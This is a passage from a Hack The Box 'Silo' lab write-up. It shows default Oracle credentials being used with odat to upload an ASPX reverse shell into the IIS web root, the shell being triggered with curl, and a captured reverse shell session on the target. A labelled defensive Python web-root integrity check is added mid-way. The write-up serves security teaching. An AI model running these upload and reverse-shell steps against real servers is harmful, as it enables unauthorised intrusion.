Exploitation


The machine has technically been pwned already: a reverse shell was planted and executed by the machine with SYSTEM privileges, since the Oracle DB runs as SYSTEM.

However, I will try to get to the SYSTEM through the low privileged user via the web service.

Based on the enumeration earlier, I would conclude that the web server has never been touched. It's likely a fresh installation where the web root is located at c:\inetpub\www

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat utlfile -s $ip -u scott -p tiger -d xe --sysdba --putfile 'c:\inetpub\wwwroot\' backdoor.aspx /home/kali/archive/htb/labs/silo/backdoor.aspx

[1] (10.10.10.82:1521): Put the /home/kali/archive/htb/labs/silo/backdoor.aspx local file in the C:\inetpub\wwwroot\ folder like backdoor.aspx on the 10.10.10.82 server
[+] the /home/kali/archive/htb/labs/silo/backdoor.aspx file was created on the c:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the backdoor.aspx file

I will upload an ASPX reverse shell there through the Oracle DB, since I have a SYSDBA credential. The upload is successful.
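From the defender's side, the artifact this step leaves behind is a new server-side script file appearing in the IIS web root outside any deployment, written by the database service rather than by IIS tooling. The following is an added example (not part of the original writeup) of a minimal file-integrity diff for a web root that flags exactly that; the temporary directory, the `EXECUTABLE_EXTS` set and the placeholder file contents are my own constructed assumptions for the demo.

```python
# Added example, not from the original writeup: baseline-and-diff check for an
# IIS web root, to catch files like backdoor.aspx being dropped into
# c:\inetpub\wwwroot by a process that is not the web deployment tooling.
# The demo uses a temp directory and constructed contents; on a real host you
# would store snapshot(Path(r"C:\inetpub\wwwroot")) as the baseline and re-run.
import hashlib
import tempfile
from pathlib import Path

# Extensions IIS hands to a script handler; a new file with one of these outside
# a planned deployment is the highest-priority finding. (Assumed set for the demo.)
EXECUTABLE_EXTS = {".aspx", ".asp", ".ashx", ".asmx"}


def snapshot(root: Path) -> dict:
    """Map every file under root (lower-cased relative path) to its SHA-256 digest."""
    result = {}
    for path in root.rglob("*"):
        if path.is_file():
            rel = str(path.relative_to(root)).lower()
            result[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return result


def diff_snapshots(baseline: dict, current: dict) -> list:
    """Return sorted (relative_path, finding) tuples for added, changed and removed files."""
    findings = []
    for rel, digest in current.items():
        if rel not in baseline:
            kind = "new_executable" if Path(rel).suffix in EXECUTABLE_EXTS else "new"
            findings.append((rel, kind))
        elif baseline[rel] != digest:
            findings.append((rel, "modified"))
    for rel in baseline:
        if rel not in current:
            findings.append((rel, "removed"))
    return sorted(findings)


def demo() -> list:
    """Simulate a clean web root, then a dropped backdoor.aspx, and return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "iisstart.htm").write_text("<html>IIS</html>")  # constructed baseline file
        baseline = snapshot(root)
        (root / "backdoor.aspx").write_text("<%-- constructed placeholder --%>")  # simulated drop
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for rel, kind in demo():
        print(f"{kind:15} {rel}")
```

Pairing this with a process-creation or file-write audit on the web root (the writer of the new file being the Oracle service, as in this box) turns the diff from "something changed" into "the database wrote a script into the web root".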

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ curl http://$IP/backdoor.aspx

Invoking the planted ASPX reverse shell with curl

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49166
Windows PowerShell running as user SILO$ on SILO
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
ps c:\windows\system32\inetsrv> hostname
SILO
ps c:\windows\system32\inetsrv> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.82
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{50cd6e47-e5c7-44a8-b294-ba01e18b9e30}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 
 

Initial Foothold Established as iis apppool\defaultapppool